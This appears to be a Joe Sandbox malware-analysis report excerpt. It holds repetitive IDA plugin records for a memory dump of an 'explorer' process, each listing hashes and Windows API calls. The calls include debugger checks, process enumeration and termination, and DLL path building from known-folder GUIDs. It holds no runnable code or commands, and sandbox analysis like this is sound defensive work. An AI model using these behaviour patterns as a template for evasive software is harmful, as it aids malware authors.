                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                          • String ID: gfffffff
                          • API String ID: 1282097019-1523873471
                          • Opcode ID: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                          • Instruction ID: eb21169a2c90eefa4253f2694f1200ce8a17a718105b664b1c3e7a5c264227ae
                          • Opcode Fuzzy Hash: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                          • Instruction Fuzzy Hash: 1AA154637247C587EB1ACB29D6843AD7BA5F721BA4F04C62ACF6A07795EB38C015C311
                          APIs
                          • RtlCaptureContext.KERNEL32 ref: 011C0EE7
                          • RtlLookupFunctionEntry.KERNEL32 ref: 011C0F06
                          • RtlVirtualUnwind.KERNEL32 ref: 011C0F52
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C0FC4
                          • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C0FDC
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C0FE9
                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C1002
                          • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C1010
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                          • String ID:
                          • API String ID: 3778485334-0
                          • Opcode ID: 35219957d421805f211166676d9093f278cb6e10f437b633a14091adcde31cb0
                          • Instruction ID: ebb0ac7e4e192f673d3e72be5ff45871b2d4256bb07980b443c00bb01a4f5674
                          • Opcode Fuzzy Hash: 35219957d421805f211166676d9093f278cb6e10f437b633a14091adcde31cb0
                          • Instruction Fuzzy Hash: E531D239208F85C6EB189B55F8843DAB3A5F798B54F50012AEA8E42764DF7CC09ACB45
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                          • String ID:
                          • API String ID: 1193533834-0
                          • Opcode ID: 5bb79ae64db4dd5a90531e248b891122a9d6996c0156bc627a2e6b39a5febb7a
                          • Instruction ID: 1fa09c914176e69bc93e695caa6bdccde7f88b07c79a087f4f57d8eee59e04bd
                          • Opcode Fuzzy Hash: 5bb79ae64db4dd5a90531e248b891122a9d6996c0156bc627a2e6b39a5febb7a
                          • Instruction Fuzzy Hash: E521E232219AC5C2EB78DF15E4583AAB3A1F7C4754F404229D69E866A8DF3CC546CB00
                          APIs
                          • RtlCaptureContext.KERNEL32 ref: 011BA885
                          • RtlLookupFunctionEntry.KERNEL32 ref: 011BA89D
                          • RtlVirtualUnwind.KERNEL32 ref: 011BA8D7
                          • IsDebuggerPresent.KERNEL32 ref: 011BA90D
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 011BA917
                          • UnhandledExceptionFilter.KERNEL32 ref: 011BA922
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: bf4840c27aff4b8c7025ec72b01c2eae3c7bd8f1c4b301b67cc516dbda11ae64
                          • Instruction ID: 7926d117ccc26bc1bdda99c73b6597b14f8159ec0c5185028e7e31297fbda948
                          • Opcode Fuzzy Hash: bf4840c27aff4b8c7025ec72b01c2eae3c7bd8f1c4b301b67cc516dbda11ae64
                          • Instruction Fuzzy Hash: 2A316336214F8186DB28DF29E8947DE73A4F798798F500219EB9D43B58DF38C546CB40
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32 ref: 0119ED6A
                          • SetEntriesInAclW.ADVAPI32 ref: 0119EDE6
                          • LocalAlloc.KERNEL32 ref: 0119EE01
                          • InitializeSecurityDescriptor.ADVAPI32 ref: 0119EE27
                          • SetSecurityDescriptorDacl.ADVAPI32 ref: 0119EE46
                          • LocalFree.KERNEL32 ref: 0119EE62
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DescriptorInitializeLocalSecurity$AllocAllocateDaclEntriesFree
                          • String ID:
                          • API String ID: 1761156657-0
                          • Opcode ID: 58b5056dbfd2429476338d745a5c66fefc3e3b966df627eb6fb129543995eacc
                          • Instruction ID: f6664ea061cc6a5333d5e4d24866376dd0738387c3abdf388b746026de3b3e7d
                          • Opcode Fuzzy Hash: 58b5056dbfd2429476338d745a5c66fefc3e3b966df627eb6fb129543995eacc
                          • Instruction Fuzzy Hash: A031B5722187C486F7649F24E45878BBBA1F385748F504119E7D946A98CFBEC049CF41
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1789362936-0
                          • Opcode ID: c8c67cd9d69cf1c5cd18c9165593eab660a6d624cff16f01b012e03e4ca3c0c1
                          • Instruction ID: 6a1ae78746c8d50e08c91c8f171fa10e0b5cefd327ab0b760c984522ca92f79c
                          • Opcode Fuzzy Hash: c8c67cd9d69cf1c5cd18c9165593eab660a6d624cff16f01b012e03e4ca3c0c1
                          • Instruction Fuzzy Hash: BE21C131219A80C2DB68DF15E5443997365F784765F404329A6BE87AD4DF3CC506CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1789362936-0
                          • Opcode ID: 2126cdc8bb9ee2d7d810141097882338e7ddfcb2433b70e954aefb8ca035f1f8
                          • Instruction ID: acfb54488416304404715f9b1a213f73d06e209eda7a3ba7d821897cfa698dc6
                          • Opcode Fuzzy Hash: 2126cdc8bb9ee2d7d810141097882338e7ddfcb2433b70e954aefb8ca035f1f8
                          • Instruction Fuzzy Hash: C421D33521DA90C2DB68DF25F544399B3A1F784765F404339A6BE86AD4DF3CC606CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateCurrentFirstNextProcessSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3177329567-0
                          • Opcode ID: 3cc2d6c88128d3cd302e3c3b427e122420062b561a5866bb653fc894148c4347
                          • Instruction ID: f157aad263af9d5921d5b3b1ecc384666fb2de177e8e24d44a659b289488a954
                          • Opcode Fuzzy Hash: 3cc2d6c88128d3cd302e3c3b427e122420062b561a5866bb653fc894148c4347
                          • Instruction Fuzzy Hash: C601A976618A8483EB68AF55F44839AB7B0F7D8758F405229B78A86A68DF3CC545CB00
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: c5c1768aadb60378ad22162b9e4730754fad96458e27b0b14d4275e4d892deba
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: c5c1768aadb60378ad22162b9e4730754fad96458e27b0b14d4275e4d892deba
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: e9356f170158ed85045823dcdf42e8ebd6240593bc235c43491c703c7f15f5e3
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: e9356f170158ed85045823dcdf42e8ebd6240593bc235c43491c703c7f15f5e3
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: c8dc4400690b48537e0aafe92792f067d9f6826edbb111285d4f7ba620e35a5e
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: c8dc4400690b48537e0aafe92792f067d9f6826edbb111285d4f7ba620e35a5e
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: 05d24737d62e8f84dcb68c5fbac8ceb44c8b287674e4df4f053df66770bee29a
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: 05d24737d62e8f84dcb68c5fbac8ceb44c8b287674e4df4f053df66770bee29a
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          APIs
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                          • LocalAlloc.KERNEL32 ref: 011A5ADE
                          • LocalAlloc.KERNEL32 ref: 011A5AFF
                          • wnsprintfW.SHLWAPI ref: 011A5B3F
                          • wnsprintfW.SHLWAPI ref: 011A5B5D
                          • wnsprintfW.SHLWAPI ref: 011A5B91
                          • wnsprintfW.SHLWAPI ref: 011A5BAF
                          • LocalFree.KERNEL32 ref: 011A64D6
                          • LocalFree.KERNEL32 ref: 011A6502
                          • LocalFree.KERNEL32 ref: 011A650D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$wnsprintf$Free$Alloc$FolderKnownPathTasklstrlen
                          • String ID: #$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL${0EFCC0CA-E494-495E-8BFA-3EB3121C6E0D}${10BFE215-061D-40FD-8815-5C8F72644B28}${21A40B76-C3B4-4664-B31E-2DC0D0725B06}${2E8EFBDF-A02C-4179-863C-6A29FA78FF6A}${3ABDA021-5E41-4624-98B4-20ADDEEE7D16}${3D978FEE-C814-4C99-BF7F-2D6040603FEF}${46435729-DE34-4BF3-A07E-81990A717CAA}${51BDD1C4-FA3F-488D-BF83-3BBD8F08065E}${55D5946A-D46C-496A-8BBC-D8EBB9A0573D}${57B617B9-43BD-4946-B949-B1B194BB326C}${59D2C462-5CE2-4677-901C-CF6D47F94E01}${5D9EC1ED-026C-4BA9-A823-A81E93CFDE64}${6A5EA296-14C9-4F73-8340-85FC05DB9D41}${71AEF5B1-1CB5-4E55-A831-320B97C08AF7}${7E4AF241-9188-44CB-AED1-67CE1C5CEEB4}${86CA2FB5-8D14-4AB7-A21A-B94AA27996D1}${91A76877-BC0D-4C96-A5BB-E6DFBFDD6440}${94FB9D8F-CD00-49FB-90DB-319F100025FD}${A833ED33-AB79-42C4-8F18-2B6F78AB7B5D}${AD591F04-B13F-46DE-971E-91B85D0D809A}${B03337F2-E002-4808-B68C-EFC2B3B7D965}${C1BD1AD9-E7EB-479A-9986-4CCAEACD58B1}${CBA71F71-923D-4984-871A-825467F689CB}${CC9E0085-98A2-4541-ADA5-57C053963E95}${CD6CD427-F451-49BC-AC5F-8EF639C64D84}${D2513884-49A5-4BCA-820E-5E259340F793}${F7C89374-15C9-42DA-9AB6-6BF0F6C9A22F}${FAC8FDCC-9415-493E-AED0-258910F001AC}${FCDCDDD8-4368-4A5F-97C4-D82E725DF941}${FD6426E3-D0BC-4529-82F7-5F6E49413ADF}
                          • API String ID: 1623426732-1736767971
                          • Opcode ID: 6f979de90f3d0588231c6db74986d895f760c93b8a5441ed2a1cde6316bd014c
                          • Instruction ID: 6b6dc6563322fdaa7ccc12889a577046e3dc9fa70e23f18b0b86deee6a48a332
                          • Opcode Fuzzy Hash: 6f979de90f3d0588231c6db74986d895f760c93b8a5441ed2a1cde6316bd014c
                          • Instruction Fuzzy Hash: C552B535518A9AD6EA189F55F8043DA6772F7C4B49F900136FB8E43A28EF3DC54ACB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast_errno
                          • String ID:
                          • API String ID: 1012874770-0
                          • Opcode ID: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                          • Instruction ID: 30a898c57f3ac471ac024d96893acae59e796766c49ffa3e7826eaa03875a352
                          • Opcode Fuzzy Hash: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                          • Instruction Fuzzy Hash: 88815322A5154685DB49BF35C8F4BEE2331ABE8F4CF046132CA4DAB725CF21D84583D0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                          • String ID: 8
                          • API String ID: 3117981272-4194326291
                          • Opcode ID: 5867b1f840c82ca0895774d01bb670b5c5b517109d049e330d4ccd184464ac88
                          • Instruction ID: 1105049723ddb398698cc4bc6d343680c35633a69bb17ab9b63c3048700221ce
                          • Opcode Fuzzy Hash: 5867b1f840c82ca0895774d01bb670b5c5b517109d049e330d4ccd184464ac88
